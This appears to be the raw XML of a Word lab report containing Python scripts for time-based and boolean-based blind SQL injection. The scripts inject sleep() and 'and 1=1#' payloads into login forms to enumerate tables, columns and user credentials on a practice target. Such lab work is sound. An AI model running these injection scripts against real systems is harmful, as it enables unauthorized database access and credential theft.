          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A574C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judge_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5223E47A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判断响应时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600FF4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ime = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>html_get_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4F04C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3 &lt;= time &lt; 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05778EB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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB4B2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046E683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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9FD78D" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011CF519" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF36E6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html_get_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6BDEAF8B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返回响应时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59015C2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q = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>requests.session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243963B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ua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UserAgent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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B24C2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headers = {'User-Agent': </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ua.random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1F44C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imeout = 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799DBE3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ponse = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>req.ge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headers=headers, timeout=timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339701A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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>response.elapsed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.seconds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="432703AA" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC459BD" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B37E5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html_is_exi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2603229B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</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是否正常回显</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61535AF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q = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>requests.ge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55D59A9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req:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9832B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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDDDE6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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB2742" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A0DEE22" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6375829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time_based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2E1EC3F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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>judge_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 + "' and sleep(3)--+")):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5021D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print("single")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362FD3E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 = "' and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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2379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else :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="787B656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print("double")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EF3B6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 = '" and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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C69D6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ayload_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>",sleep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(3),1)--+"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32927BF3" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A9DDD6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------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取表</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B03C4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ables_list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table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end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F061C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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ['emails', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>referers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>uagents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>', 'users']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587F71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 xml:space="preserve">0, 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ables_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C35EF6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f'{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+ 1}.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tables_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[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]}', end=' ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2DD65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tables_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>int(input('\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nPlease</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> input name of the table required:\n')) - 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7584FA4E" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09838AB6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------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取字段</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-----------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166D0BB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columns_list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column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end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7067034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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ['id', 'username', 'password']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF6BE6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 xml:space="preserve">0, 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lumns_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F31AA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f'{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+ 1}.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[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]}', end=' ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5752836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13892274" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFB698D" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取记录</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-----------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0CFC8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chose_table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columns_list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heade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ayload_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334154C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data = [['1', 'Dumb', 'Dumb'], ['2', 'Angelina', 'I-kill-you'], ['3', 'Dummy', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p@ssword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>']]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E794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spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5EDBC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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i.ljust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(20), end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7523270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 xml:space="preserve">'\n' + '-' * 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lumns_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) * 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C41F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data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C145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j in i:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC47B5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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.ljust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(20), end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC5B2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 xml:space="preserve">'\n' + '-' * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>le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lumns_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) * 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18019088" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F126F13" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F"/>
    <w:p w14:paraId="513BF22F" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:t>Posts/bool_util.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6DD7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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2A5F9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bs4 import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BeautifulSoup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17A2036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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>urllib.parse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D68DD9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urllib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B09773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termcolor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import colored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352E7961" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F34B57" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9E1EE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def log(content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F15272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time.strftime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">('%H:%H:%S', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time.local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ime.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698C518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colored('[' + str(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>) + ']', 'green') + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47203E72" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B08812B" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50501BB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_):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C445E8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log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55EB1E1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_ = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EEF36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_ = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FDCC4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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request.urlopen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=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=data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7793A42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str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>res.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>().decode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D4182" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7597143B" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF00CF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can_inject_bool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772DA74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Start to use bool-based blind injection...')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D78642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 xml:space="preserve"> = ["'", '"', "')", '")']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA7201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item in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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C869F6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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039DB08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"admin" + item + ' and 1=1#',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538AB00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passwd': "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F7C6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA3FA9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56D1732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3C3AB7F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33B1608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fonts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D183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1E9F1E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Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595AC0C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turn True, item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A334D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552FEB8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Not Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6CAEA8" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2675377A" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79DE11F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exe_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>func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function):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576532D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global length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C156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21):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AF070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20AEAC1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' or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>length(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>' + function + ')={0}#'.format(str(i)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C6F1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passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F319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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EED62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6299B37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3D8793C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153D438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# print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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A54BD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if "flag.jp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4FF5E1F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26E98E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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690313D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length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361C790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 xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5C6A5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[ch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)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32, 127)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68998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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D65E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0AEE972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7E28D78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data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE1509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spellStart"/>
      <w:proofErr w:type="gram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" + function + f",{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},1)='{j}'#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DEEA4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passwd': 'admin'</w:t>
      </w:r>
    </w:p>
